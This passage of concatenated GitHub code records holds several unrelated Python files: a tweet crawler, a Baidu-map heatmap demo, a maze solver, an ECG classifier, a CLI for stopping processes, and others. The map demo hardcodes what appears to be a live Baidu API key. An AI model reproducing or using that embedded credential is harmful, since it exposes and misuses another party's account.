str(row['Response2']) != 'nan':\n time.sleep(1)\n message_textarea_element.send_keys(' ' + str(row['Response2']))\n time.sleep(1)\n message_add_to_conversation_element.click()\n time.sleep(1)\n\n download_button_element = driver.find_element_by_css_selector(\"a.line-button-white\")\n download_button_element.click()\n time.sleep(4)\n\n # get the image source\n imgfilename = str(row['Item.n']) + \"_\" + str(row['list']) + '.png'\n print('imgfilename ' + imgfilename)\n imgsrc = driver.find_element_by_css_selector('img').get_attribute('src')\n imgdata = imgsrc.replace('data:image/png;base64,', '')\n\n # download\n with open(local_dir + '/' + imgfilename, 'wb') as fh:\n fh.write(base64.b64decode(imgdata))\n\n time.sleep(1)\n driver.close()\n driver.quit()\n time.sleep(1)\n # upload to remote server\n cnopts = pysftp.CnOpts(knownhosts='./known_hosts')\n with pysftp.Connection(sftp_domain, username=ssh_login_name, password=password, cnopts=cnopts) as sftp:\n sftp.put_r(local_dir, sftp_dir)\n\nprint(\"Done.\")\n","repo_name":"ryanchausse/aubrie_masters_ibex","sub_path":"whatsapperize.py","file_name":"whatsapperize.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39197622017","text":"#!/usr/bin/env python\nfrom os import makedirs\nfrom os.path import join, isfile\nfrom csv import DictWriter, DictReader\nfrom utils import ParallelMerge\nfrom snscrape.modules.twitter import TwitterSearchScraper\n\nhashtagfile = \"hashtags.txt\"\nexcludefile = \"exclude.txt\"\nread_exclude, write_exclude = True, True\noutputdir = \"mined-tweets\"\nlanguages = [\"en\", \"fr\", \"de\", \"ar\"]\ndates = [\"2020-03-01\", \"2021-09-01\"]\nregion = \"Europe\"\ncount = 30\n\ndef read_hashtags(filename):\n hashtags = list()\n with open(filename, \"rb\") as f:\n for line in f:\n hashtags.append(line.strip().decode())\n return hashtags\n\ndef write_tweets(tweets, filename, fieldnames=[\"id\", \"date\", \"country\", \"lang\", \"content\"]):\n with open(filename, \"w\", newline='', encoding='utf-8') as csv_file:\n writer = DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for tweet in tweets:\n if not hasattr(tweet, \"country\"):\n try:\n tweet.country = tweet.place.country\n except AttributeError:\n tweet.country = \"None\"\n\n writer.writerow(dict(zip(fieldnames, [getattr(tweet, attr) for attr in fieldnames])))\n\ndef read_tweets(filename):\n with open(filename, newline='', encoding='utf-8') as csvfile:\n return list(DictReader(csvfile))\n\ndef read_excludefile(filename):\n ids = list()\n if isfile(filename):\n with open(filename, \"rb\") as f:\n for line in f:\n ids.append(int(line))\n return ids\n\ndef append_exclude(filename, ids):\n with open(filename, \"a+b\") as f:\n for id_ in ids:\n f.write(f\"{id_}\\n\".encode())\n\ndef crawl_tweets(hashtags, since=None, until=None):\n assert since is not None or until is not None\n makedirs(outputdir, exist_ok=True)\n\n since = f\"since:{since}\" if since else None\n until = f\"until:{until}\" if until else None\n langs = f\"({' OR '.join(f'lang:{lang}' for lang in languages)})\"\n near = f\"near:{region}\"\n filter_retweets = \"exclude:nativeretweets exclude:retweets\"\n\n filename = join(outputdir, \"-\".join(filter(None, [since, until])).replace(\":\", \"-\") + \".csv\")\n scrapers, tweets, unique_contents = list(), list(), set()\n exclude_ids = read_excludefile(excludefile) if read_exclude else list()\n\n for hashtag in hashtags:\n scrapers.append(TwitterSearchScraper(query=\" \".join(filter(None, [hashtag, since, until, langs, near, filter_retweets]))))\n\n try:\n with ParallelMerge(*[scraper.get_items() for scraper in scrapers]) as items:\n for tweet in items:\n if tweet.id not in exclude_ids and tweet.content not in unique_contents:\n tweets.append(tweet)\n unique_contents.add(tweet.content)\n print(f\"{len(tweets)} tweets mined in current run!\" , end='\\r')\n if len(tweets) >= count:\n break\n except KeyboardInterrupt:\n pass\n print()\n write_tweets(tweets, filename)\n if write_exclude:\n append_exclude(excludefile, [tweet.id for tweet in tweets])\n\n return tweets\n\nif __name__ == \"__main__\":\n hashtags = read_hashtags(hashtagfile)\n #print(\"Pre-pandemic tweets:\", len(crawl_tweets(hashtags, until=dates[0])))\n print(\"Pandemic tweets:\", len(crawl_tweets(hashtags, since=dates[0], until=dates[1])))\n","repo_name":"potamides/FOLT-Crawler","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22784514390","text":"# -*- coding: utf-8 -*\n\"\"\"\n2019-10-18\npyecharts 画图尝试\n\"\"\"\n\n# ========== 一个最基本的柱状图可视化 ==========\n# import pyecharts\n# from pyecharts.charts import Bar\n# from pyecharts import options as opts\n# # V1 版本开始支持链式调用\n# # 你所看到的格式其实是 `black` 格式化以后的效果\n# # 可以执行 `pip install black` 下载使用\n# # 不习惯链式调用的开发者依旧可以单独调用方法\n# bar = Bar()\n# bar.add_xaxis([\"衬衫\", \"羊毛衫\", \"雪纺衫\", \"裤子\", \"高跟鞋\", \"袜子\"])\n# bar.add_yaxis(\"商家A\", [5, 20, 36, 10, 75, 90])\n# bar.set_global_opts(title_opts=opts.TitleOpts(title=\"主标题\", subtitle=\"副标题\"))\n# html_file = 'bar_v2.html'\n# bar.render(html_file)\n\n# ========== 一个基本坐标系的可视乎 ==========\n# from pyecharts.faker import Collector, Faker\n# from pyecharts import options as opts\n# from pyecharts.charts import Geo\n# from pyecharts.globals import ChartType, SymbolType\n# def geo_base() -> Geo:\n# c = (\n# Geo()\n# .add_schema(maptype=\"海口\")\n# # .add(\"geo\", [list(z) for z in zip(Faker.provinces, Faker.values())])\n# .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n# .set_global_opts(\n# visualmap_opts=opts.VisualMapOpts(),\n# title_opts=opts.TitleOpts(title=\"Geo-基本示例\"),\n# )\n# )\n# c.add_coordinate(\"海南海口秀英秀英向荣\", 110.263727, 20.001732)\n# c.add_coordinate(\"海南海口龙华海垦海秀\", 110.328492, 20.031007)\n# c.add(\"geo\", [['海南海口秀英秀英向荣', 100], ['海南海口龙华海垦海秀', 50]])\n# return c\n\n# #可视化\n# geo = geo_base()\n# geo.render( 'haikou.html')\n\nBaidu_AK = \"nglMpYVKorG0aVPcom2BLWsemWbQ7P39\"\n# ========== 一个百度地图的尝试 ==========\nfrom pyecharts.charts import BMap\nfrom pyecharts.faker import Collector, Faker\nfrom pyecharts import options as opts\nimport os,json\nfrom pyecharts.globals import BMapType, ChartType\n\ndef bmap_heatmap() -> BMap:\n c = (\n BMap()\n .add_schema(baidu_ak=Baidu_AK, center=[110.3014600000, 20.0132350000], zoom=13) #缩放比例12-14之间可行\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"BMap-热力图\"),\n visualmap_opts=opts.VisualMapOpts(),\n )\n )\n # 增加坐标点\n c.add_coordinate(\"海南海口秀英秀英向荣\", 110.263727, 20.001732)\n c.add_coordinate(\"海南海口龙华海垦海秀\", 110.328492, 20.031007)\n\n # 增加坐标点之间的值\n c.add(\n \"bmap\",\n [['海南海口秀英秀英向荣', 100], ['海南海口龙华海垦海秀', 50]],\n type_=\"heatmap\",\n label_opts=opts.LabelOpts(formatter=\"{b}\"),\n )\n return c\n\n#可视化\ngeo = bmap_heatmap()\ngeo.render( 'china_bmap.html')","repo_name":"MYXue/CCF_2019_Haikou_traffic_analysis","sub_path":"codes/visualization/visualization_test.py","file_name":"visualization_test.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36601836650","text":"import logging\nfrom statistics import mean\nfrom typing import List\n\nfrom geojson import MultiLineString, Feature\n\nfrom .car import Car\n\nlogger = logging.getLogger(__name__)\n\n\nclass Points:\n def __init__(self, latitude, longitude):\n self.latitude = latitude\n self.longitude = longitude\n\n def list(self):\n return self.latitude, self.longitude\n\n\nclass Trip:\n def __init__(self):\n self.start_at = None\n self.end_at = None\n self.positions: List[Points] = []\n self.speed_average = None\n self.consumption = 0\n self.consumption_km = 0\n self.consumption_fuel = 0\n self.consumption_fuel_km = 0\n self.distance = None\n self.duration = None\n self.mileage = None\n self.car: Car = None\n self.altitude_diff = None\n self.temperatures = []\n self.id = None\n\n def add_points(self, latitude, longitude):\n self.positions.append(Points(latitude, longitude))\n\n def add_temperature(self, temp):\n self.temperatures.append(temp)\n\n def get_temperature(self):\n if len(self.temperatures) > 0:\n return float(mean(self.temperatures))\n return None\n\n def set_consumption(self, diff_level: float) -> float:\n if diff_level < 0:\n logger.debugv(\"trip has negative consumption\")\n diff_level = 0\n self.consumption = diff_level * self.car.battery_power / 100\n try:\n self.consumption_km = 100 * self.consumption / self.distance # kw/100 km\n except TypeError:\n raise ValueError(\"Distance not set\") from TypeError\n return self.consumption_km\n\n def set_fuel_consumption(self, consumption) -> float:\n if self.distance is None:\n raise ValueError(\"Distance not set\")\n if consumption < 0:\n logger.debugv(\"trip has negative fuel consumption\")\n self.consumption_fuel = round(consumption * self.car.fuel_capacity / 100, 2) # L\n self.consumption_fuel_km = round(100 * self.consumption_fuel / self.distance, 2) # L/100 km\n return self.consumption_fuel_km\n\n def to_geojson(self):\n multi_line_string = MultiLineString(tuple(map(list, self.positions)))\n return Feature(geometry=multi_line_string, properties={\"start_at\": self.start_at, \"end_at\": self.end_at,\n \"average speed\": self.speed_average,\n \"average consumption\": self.consumption_km,\n \"average consumption fuel\": self.consumption_fuel_km})\n\n def get_info(self):\n\n res = {\"consumption_km\": self.consumption_km, \"start_at\": self.start_at,\n \"consumption_by_temp\": self.get_temperature(), \"positions\": self.get_positions(),\n \"duration\": self.duration * 60, \"speed_average\": self.speed_average, \"distance\": self.distance,\n \"mileage\": self.mileage, \"altitude_diff\": self.altitude_diff, \"id\": self.id,\n \"consumption\": self.consumption\n }\n if self.car.has_battery():\n res[\"consumption_km\"] = self.consumption_km\n\n if self.car.has_fuel():\n res[\"consumption_fuel_km\"] = self.consumption_fuel_km\n\n return res\n\n def set_altitude_diff(self, start, end):\n try:\n self.altitude_diff = end - start\n except (NameError, TypeError):\n pass\n\n def get_positions(self):\n lat = []\n long = []\n for position in self.positions:\n lat.append(position.latitude)\n long.append(position.longitude)\n return {\"lat\": lat, \"long\": long}\n","repo_name":"flobz/psa_car_controller","sub_path":"psa_car_controller/psacc/model/trip.py","file_name":"trip.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"70"}
+{"seq_id":"32882935899","text":"'''\nStop a program from running:\n\n chalmers stop server1\n\nStopping a program will send a signal to the program. The signal can be set beforehand by:\n\n chalmers set server1 stopsignal=SIGTERM\n \nStop differs from off, off will not stop the program.\nWhen off a program will not be started at system boot (or `start --all`)\n\nWhen a program is *on* it will still start at system boot\neven if you manually stop it before a reboot.\n'''\n\nfrom __future__ import unicode_literals, print_function\n\nfrom argparse import RawDescriptionHelpFormatter\nimport logging\nimport sys\n\nfrom clyent import print_colors\n\nfrom chalmers import errors\nfrom chalmers.utils import cli\n\n\nlog = logging.getLogger('chalmers.stop')\n\ndef main(args):\n\n programs = cli.select_programs(args, filter_paused=False, force=args.force)\n\n programs = cli.filter_programs(programs, lambda p: not p.is_running, 'Stopping', 'stopped')\n if not programs:\n return\n for prog in programs:\n if prog.is_running:\n print(\"Stopping program %-25s ... \" % prog.name[:25], end=''); sys.stdout.flush()\n try:\n prog.stop(args.force)\n except errors.StateError as err:\n log.error(err.message)\n except errors.ConnectionError as err:\n print_colors(\"[ {=ERROR!c:red} ] %s (use --force to force stop the program)\" % err.message)\n else:\n print_colors(\"[ {=OK!c:green} ]\")\n else:\n print_colors(\"Program is already stopped: %-25s \" % prog.name[:25], \"[{=STOPPED!c:yello} ]\")\n\ndef pause_main(args):\n\n programs = cli.select_programs(args, filter_paused=False)\n programs = cli.filter_programs(programs, lambda p: p.is_paused, 'Pausing', 'paused')\n if not programs:\n return\n\n for prog in programs:\n log.info(\"Pausing program %s\" % (prog.name))\n if prog.is_running:\n log.warn(\"%s is running and will not restart on system reboot\" % (prog.name))\n\n prog.state.update(paused=True)\n\ndef unpause_main(args):\n\n programs = cli.select_programs(args, filter_paused=False)\n programs = cli.filter_programs(programs, lambda p: not p.is_paused, 'Unpausing', 'unpaused')\n\n if not programs:\n return\n\n for prog in programs:\n log.info(\"Unpausing program %s\" % (prog.name))\n prog.state.update(paused=False)\n if not prog.is_running:\n log.warning(\"%s is not running and will start on next system boot\" % (prog.name))\n\n\ndef add_parser(subparsers):\n parser = subparsers.add_parser('stop',\n help='Stop running a command',\n description=__doc__,\n formatter_class=RawDescriptionHelpFormatter)\n\n cli.add_selection_group(parser)\n parser.add_argument('--force', action='store_true',\n help='Force kill a program (stopsignal will be ignored)'\n )\n\n parser.set_defaults(main=main)\n\n parser = subparsers.add_parser('off',\n help='Don\\'t run a program on system boot or `chalmers start --all`',\n description=__doc__,\n formatter_class=RawDescriptionHelpFormatter)\n\n cli.add_selection_group(parser)\n\n parser.set_defaults(main=pause_main)\n\n parser = subparsers.add_parser('on',\n help='Run a program on system boot or `chalmers start --all`',\n description=__doc__,\n formatter_class=RawDescriptionHelpFormatter)\n\n cli.add_selection_group(parser)\n\n parser.set_defaults(main=unpause_main)\n","repo_name":"Anaconda-Platform/chalmers","sub_path":"chalmers/commands/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"71"}
+{"seq_id":"14191013596","text":"import requests\r\nfrom random import randint\r\n\r\nurl = 'https://svnweb.freebsd.org/csrg/share/dict/words?view=co&content-type=text/plain'\r\ndef get_names_list():\r\n usernames = requests.get(url)\r\n text = usernames.text\r\n # print(text)\r\n return text.split()\r\n\r\ndef get_random_word():\r\n name_list = get_names_list()\r\n random_number = randint(0,len(name_list))\r\n random_word = name_list[random_number]\r\n random_salt = randint(0,9999)\r\n print(random_word + str(random_number+random_salt))\r\n\r\nget_random_word()\r\n\r\n","repo_name":"aayushnig07/username_generator","sub_path":"Username_Generator/username_generator.py","file_name":"username_generator.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"12597594604","text":"from flask import Flask, request, abort\nfrom flask_apscheduler import APScheduler\nfrom services import sleep_and_sum\n\nfrom src.serverless_manager.function_process.function_process_manager import FunctionProcessManager\n\napp = Flask(__name__)\nprocess_manager = FunctionProcessManager()\n\nservices = [sleep_and_sum]\nservices_map = {func.__name__: func for func in services}\nrequest_count = 0\n\n\n@app.route('/', methods=['GET'])\ndef run_serverless_service(service_name: str):\n service = services_map.get(service_name)\n if service is None:\n abort(404)\n answer = process_manager.run_function_on_endpoint(service, request.args)\n global request_count\n request_count += 1\n return answer\n\n\n@app.route('/active_processes', methods=['GET'])\ndef active_processes():\n return [process.pid for process in process_manager.function_processes]\n\n\n@app.route('/request_counter', methods=['GET'])\ndef request_counter():\n return str(request_count)\n\n\nif __name__ == \"__main__\":\n scheduler = APScheduler()\n scheduler.add_job(id=\"close_idle_processes\", func=process_manager.close_idle_processes, trigger='interval',\n seconds=2)\n scheduler.init_app(app)\n scheduler.start()\n app.run()\n","repo_name":"SagiShum/serverless_manager","sub_path":"src/serverless_manager/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7493903523","text":"import sys\n\nclass Node:\n def __init__(self,state,parent,action):\n self.distance = parent.distance+1 if parent is not None else 0\n self.state=state\n self.parent=parent\n self.action=action\n \nclass StackFrontier:\n def __init__(self):\n self.frontier =[]\n \n def add(self,node):\n self.frontier.append(node)\n def empty(self):\n return len(self.frontier)==0\n def contains_state(self, state):\n return any(state==node.state for node in self.frontier)\n def remove(self):\n node = self.frontier[-1]\n self.frontier=self.frontier[:-1]\n return node\nclass QueueFrontier(StackFrontier):\n def remove(self):\n node = self.frontier[0]\n self.frontier=self.frontier[1:]\n return node\nclass ListFrontier(StackFrontier):\n def remove(self,node):\n self.frontier.remove(node)\n def all(self):\n return self.frontier\nclass Maze:\n def __init__(self, filename):\n try:\n with open(filename,\"r\") as f:\n contents = f.read()\n contents = contents.splitlines()\n except:\n raise Exception(\"Unable to read file\")\n \n self.height = len(contents)\n self.width = max(len(line) for line in contents)\n self.contents=contents\n walls=[]\n for i in range(self.height):\n row=[]\n for j in range(self.width):\n try:\n if contents[i][j] == \"S\":\n self.start=(i,j)\n row.append(False)\n elif contents[i][j] == \"E\":\n self.goal=(i,j)\n row.append(False)\n elif contents[i][j]==\" \":\n row.append(False)\n else:\n row.append(True)\n except IndexError:\n row.append(False)\n walls.append(row)\n self.walls = walls\n self.solution = None\n if self.start is None:\n raise Exception(\"Maze must have exactly one starting point\")\n if self.goal is None:\n raise Exception(\"Maze must have exactly one goal point\")\n def neighbours (self,state):\n row,col= state\n candidates =[\n (\"up\",(row-1,col)),\n (\"down\",(row+1,col)),\n (\"left\",(row,col-1)),\n (\"right\",(row,col+1))\n ]\n actions=[]\n for action ,(r,c) in candidates:\n try:\n if not self.walls[r][c]:\n actions.append((action,(r,c)))\n except:\n continue\n return actions\n def print(self):\n solution = self.solution[1] if self.solution is not None else None\n for i,row in enumerate(self.walls):\n for j,col in enumerate(row):\n if col:\n print(\"█\",end=\"\")\n elif (i,j)==self.start:\n print('S',end=\"\")\n elif (i,j) == self.goal:\n print(\"E\",end=\"\")\n elif solution is not None and (i,j) in solution:\n print(\"*\",end=\"\")\n else:\n print(' ',end=\"\")\n print(\"\")\n print()\n \n def solve(self, algorithm):\n def h(state):\n x,y=self.goal\n a,b=state\n d = abs(x-a)+abs(y-b)\n return d\n \n def get_nearest_node():\n nodes = self.frontier.all()\n if algorithm == \"GFS\":\n distances = {node : h(node.state) for node in nodes}\n elif algorithm == \"KSS\":\n distances = {node : h(node.state)+node.distance for node in nodes}\n best_node = min(distances,key=lambda x: distances.get(x))\n self.frontier.remove(best_node)\n return best_node\n if algorithm==\"BFS\":\n self.frontier = QueueFrontier()\n elif algorithm==\"DFS\":\n self.frontier = StackFrontier()\n elif algorithm in [\"GFS\",\"KSS\"]:\n self.frontier = ListFrontier()\n else:\n raise Exception(\"Unknown algorithm {}. 
Either select BFS or DFS\".format(algorithm))\n node = Node(state=self.start,parent=None, action=None)\n self.num_explored = 0\n self.set_explored = set()\n self.frontier.add(node)\n while True:\n if self.frontier.empty():\n raise Exception (\"No Solution\")\n if algorithm in [\"DFS\",\"BFS\"]:\n node = self.frontier.remove()\n elif algorithm in [\"GFS\",\"KSS\"]:\n node = get_nearest_node()\n self.num_explored+=1 \n if node.state ==self.goal:\n actions = []\n cells = []\n while node.parent is not None:\n actions.append(node.action)\n cells.append(node.state)\n node=node.parent\n actions.reverse()\n cells.reverse()\n self.solution = (actions,cells)\n return\n self.set_explored.add(node.state)\n for action,state in self.neighbours(node.state):\n if state not in self.set_explored and not self.frontier.contains_state(state):\n child = Node(state,node,action)\n self.frontier.add(child)\n \ndef main():\n alg = {\"DFS\" : \"Depth First Search\",\"BFS\" : \"Breath First Search\",\"GFS\":\"Greedy First Search\",\"KSS\":\"K Star Search\"}\n maze = Maze(sys.argv[1])\n if len(sys.argv) == 3:\n algorithm = sys.argv[2]\n else:\n algorithm = \"KSS\"\n maze.solve(algorithm=algorithm)\n maze.print()\n print(\"Path explored : \",maze.num_explored)\n print(\"Way length : \",len(maze.solution[1]))\n print(\"Algorithm : \",alg[algorithm])\nif __name__ == '__main__':\n main()\n","repo_name":"TheShubhendra/maze-solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"42102362139","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 27 20:13:06 2022\n@author: Daniel\n\"\"\"\n\n############################## SE IMPORTAN LIBRERIAS ##########################\nimport pandas as pd\nimport serial\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nfrom itertools import count\nfrom matplotlib.animation import FuncAnimation\nimport multiprocessing\nimport time\n\nimport scipy.signal\nimport funcion_BPK_mt as fn\nimport pyhrv\nimport pyhrv.nonlinear as nl\nimport pyhrv.tools as tools\nimport biosppy\nimport nolds\nimport spectrum\n\nimport sklearn as sk\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport random\nfrom joblib import dump, load\n################### GUARDAR LO QUE VIENE DEL SERIAL EN UN BUFFER###############\nser = serial.Serial(\n port= ('COM9'),\n baudrate = 115200,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\ndatos = []\ndata_list = [] #Aqui se guardan los df en distintos segundos\nsave_predictions = []\nn_list = 0 #Que version de la lista estoy leyendo\nval = 5\nval_stop = 19\n\n \n######################### Funcion formato de tiempo a Segundos###############\ndef to_seconds(hora):\n m, s, ms, = hora.split(\" \")\n #return int(mins)*360 + int(segs) + float(ms)\n return int(m)*60 + int(s) + int(ms)/1000\ndef grafica():\n Wn = 0.2 #Cut out frequencies higher 50 hZ\n b, a = scipy.signal.butter(4,Wn, 'low', analog = False) #filtro orden 4\n heart_data_filtered = scipy.signal.filtfilt(b,a,df.ecg)\n return heart_data_filtered\n\n\n\n\n\nwhile 1:\n try:\n if ser.inWaiting() != 0:\n read_line = ser.readline()\n decoded_line = read_line.decode('utf-8').rstrip()\n datos.append(decoded_line) #agrego datos a lo ultimo de la lista\n print (decoded_line)\n if ser.inWaiting() == 0:\n #global df\n df = pd.DataFrame(datos) \n df = df[0].str.split(',', expand = True) #separa por comas\n df[0] = df[0].str.replace(\"'\",\"\") # Remove quotes \n df[0] = df[0].str.replace(\":\",\" \") # add space \n df[0] = df[0].str.replace(\".\",\" \") # add space \n df[0] = df[0].map(to_seconds)\n df.columns = ['time','ecg']\n df['ecg']=df['ecg'].astype(float)\n \n #df[['time','ecg']] = df[['time','ecg']].astype(int)\n \n\n print(\"Quiero ver cuantas veces te actualizas\")\n if df[df.eq(val).any(1)].empty == False: #Si esta lleno, ejecutar funcion\n \n data_list.append(df)\n df = df.iloc[0:0] #vacio el dataframe\n datos.clear()\n val = val+5\n \n print ('****************** Si se encontro ************************')\n #######################Filto Butterworth #########################\n Wn = 0.2 #Cut out frequencies higher 50 hZ\n b, a = scipy.signal.butter(4,Wn, 'low', analog = False) #filtro orden 4\n heart_data_filtered = scipy.signal.filtfilt(b,a,data_list[n_list].ecg)\n\n ################################# Graficas ##################################\n plt.figure(1)\n plt.plot(data_list[n_list].time, data_list[n_list].ecg)\n plt.plot(data_list[n_list].time, heart_data_filtered)\n plt.xlabel('Segundos (S)')\n plt.ylabel('Milivoltios (mV)')\n \n plt.show()\n plt.pause(0.02) \n ############################# Posicion picos ################################\n voltaje = 0.4\n picos,_ = scipy.signal.find_peaks(heart_data_filtered,height=(voltaje))\n plt.figure(2)\n plt.plot(data_list[n_list].time, heart_data_filtered)\n plt.plot(data_list[n_list].time[picos], 
heart_data_filtered[picos],\"X\")\n plt.axhline(voltaje, color = 'black', label = 'threshold')\n plt.xlabel('Segundos (S)')\n plt.ylabel('Milivoltios (mV)')\n \n plt.show()\n plt.pause(0.02)\n ############################ better peak finder #############################\n\n # Function that looks the peaks on the derivative\n d_ecg, peaks_d_ecg = fn.decg_peaks(heart_data_filtered, data_list[n_list].time)\n plt.figure(3)\n plt.show()\n plt.pause(0.02)\n \n #Function with other parameters as height and x distance 0.65\n #Corrige los picos 0.59\n Rwave_peaks_d_ecg = fn.d_ecg_peaks(d_ecg,peaks_d_ecg,data_list[n_list].time,0.6,0.4)\n plt.figure(4)\n plt.show()\n plt.pause(0.02)\n \n #Grafica donde vemos la derivada y la original, pero comparando los picos de \n #ambas graficas y poniendo el pico de la derivada en la original, esto para\n #descaratar falsos picos en la lectura del ECG\n Rwave_t = fn.Rwave_peaks(heart_data_filtered, d_ecg, Rwave_peaks_d_ecg,data_list[n_list].time)\n # plt.figure(5)\n plt.show()\n plt.pause(0.02)\n \n ################################ RR interval ###############################\n #comparamos un data point de un pico con el otro datapoint del siguiente pico\n\n RR_intervalo = 1/2*np.diff(Rwave_t) #Despues de la derivada\n nni_results = nl.poincare(RR_intervalo, ellipse= True, vectors= True, legend= True)\n \n\n # SD1 (T) REFLEJA LA VARIACIÓN DE LATIDO A LATIDO / Variabilidad latido a latido\n SD1 = nni_results['sd1']\n # SD2 (L) RELFLEJA LAS FLUCTUACIONES GENERALES / Variabilidad en el tiempo\n SD2 = nni_results['sd2']\n centro = nni_results['centro']\n #plt.figure(6)\n #plt.show()\n plt.pause(0.02)\n\n\n print('SD1 es:',SD1)\n print('SD2 es:',SD2)\n print('Centro es: ',centro)\n \n ################################ MODELO ENTRENADO #############################\n model = load(r'Z:\\Universidad UVG\\Sexto Año\\Segundo Ciclo\\Tesis\\Tesis-2022-Erick-Aquino\\Varilla Programadora\\Códigos_modo_automático\\Python_ECG\\Modelo_entrenado.joblib')\n input_data = (SD1,SD2,centro) #ejercicio NEW16\n #input_data = (8.142530319255803,10.335337440064551,355.4230769230769) #Resposo P10_1\n #input_data = (9.630635074824735,16.05824359947251,365.92) #Resposo P10_2\n #input_data = (10.002720718319964,19.43872283814529,421.72727272727275) #R#esposo P10_5\n\n #cambiando un poco to numpy array\n input_data_as_numpy_array = np.asarray(input_data)\n\n #reshape the numpy array as we are predicting for only one instance\n input_data_reshape = input_data_as_numpy_array.reshape(1,-1)\n\n prediction = model.predict(input_data_reshape)\n save_predictions.append(prediction[0])\n print(prediction)\n if (prediction[0]==0):\n print('La persona esta en reposo según su ECG')\n else:\n print('La persona esta haciedo un esfuerzo físico según su ECG')\n \n ############### Actualizar contadores ###########################\n n_list = n_list + 1\n ###############################################\n #grafica()\n #p1 = multiprocessing.Process(target=grafica)\n #p1.start()\n #p1.join()\n #p1 = multiprocessing.Process(target=grafica)\n if df[df.eq(val_stop).any(1)].empty == False: #Si esta lleno, ejecutar funcion\n ser.close()\n break\n \n except KeyboardInterrupt:\n ser.close()\n except NameError:\n continue\nprint ('El resumen de predicciones de cada 20 segs es:',save_predictions)\n'''\nguardar_datos = input('¿Quieres guardar los datos para un análisis posterior? 
Y/N ')\n\nif guardar_datos == \"Y\":\n print(\"Se han guardado los valores\")\nelif guardar_datos == \"N\":\n print(\"No se han guardado los valores\")\nelse:\n print(\"No es un caracter válido\")\n '''","repo_name":"TheDany4545/Tesis-2022-Erick-Aquino","sub_path":"Varilla Programadora/Códigos_modo_automático/Multiprocessing/Multiprocessing.py","file_name":"Multiprocessing.py","file_ext":"py","file_size_in_byte":8351,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18222500280","text":"import sys\nimport time\nimport pathlib\nimport json\nimport logging\nimport inspect\nimport concurrent.futures as futures\n\nfrom ..util import json_encode\nfrom ..util import threaded_image_io\nfrom ..util import log_util\n\nclass DummyIO:\n def __init__(self, logger):\n self.logger = logger\n def write(*args, **kws):\n self.logger.warn('Trying to write files, but file writing was disabled!')\n\nclass TimepointHandler:\n IMAGE_COMPRESSION = threaded_image_io.COMPRESSION.DEFAULT\n LOG_LEVEL = logging.INFO\n IO_THREADS = 4\n\n def __init__(self, data_dir, log_level=None, scope_host='127.0.0.1', dry_run=False):\n \"\"\"Setup the basic code to take a single timepoint from a timecourse experiment.\n\n Parameters:\n data_dir: directory where the data and metadata-files should be read/written.\n io_threads: number of threads to use to save image data out.\n loglevel: level from logging library at which to log information to the\n logfile in data_dir. (Subclasses can log information with self.logger)\n If not specified, fall back to the class attribute LOG_LEVEL. This\n allows a subclass to set a default log level, which still can be\n over-ridden from the command line.\n scope_host: IP address to connect to the scope server. If None, run without\n a scope server.\n dry_run: if True, do not write any files (including log files; log entries\n will be printed to the console).\n \"\"\"\n self.data_dir = pathlib.Path(data_dir)\n self.experiment_metadata_path = self.data_dir / 'experiment_metadata.json'\n with self.experiment_metadata_path.open('r') as f:\n self.experiment_metadata = json.load(f)\n self.positions = self.experiment_metadata['positions'] # dict mapping names to (x,y,z) stage positions\n self.skip_positions = set(self.experiment_metadata.setdefault('skip_positions', []))\n if scope_host is not None:\n from .. 
import scope_client\n self.scope, self.scope_properties = scope_client.client_main(scope_host)\n if hasattr(self.scope, 'camera'):\n self.scope.camera.return_to_default_state()\n else:\n self.scope = None\n self.write_files = not dry_run\n self.logger = log_util.get_logger(str(data_dir))\n if log_level is None:\n log_level = self.LOG_LEVEL\n elif isinstance(log_level, str):\n log_level = getattr(logging, log_level)\n self.logger.setLevel(log_level)\n if self.write_files:\n self.image_io = threaded_image_io.ThreadedIO(self.IO_THREADS)\n handler = logging.FileHandler(str(self.data_dir/'acquisitions.log'))\n else:\n self.image_io = DummyIO(self.logger)\n handler = logging.StreamHandler()\n handler.setFormatter(log_util.get_formatter())\n self.logger.addHandler(handler)\n self._job_thread = futures.ThreadPoolExecutor(max_workers=1)\n\n def run_timepoint(self, scheduled_start):\n try:\n self.timepoint_prefix = time.strftime('%Y-%m-%dt%H%M')\n self.scheduled_start = scheduled_start\n self.start_time = time.time()\n self._job_futures = []\n self.logger.info('Starting timepoint {} ({:.0f} minutes after scheduled)', self.timepoint_prefix,\n (self.start_time-self.scheduled_start)/60)\n # record the timepoint prefix and timestamp for this timepoint into the\n # experiment metadata\n self.experiment_metadata.setdefault('timepoints', []).append(self.timepoint_prefix)\n self.experiment_metadata.setdefault('timestamps', []).append(self.start_time)\n self.configure_timepoint()\n for position_name, 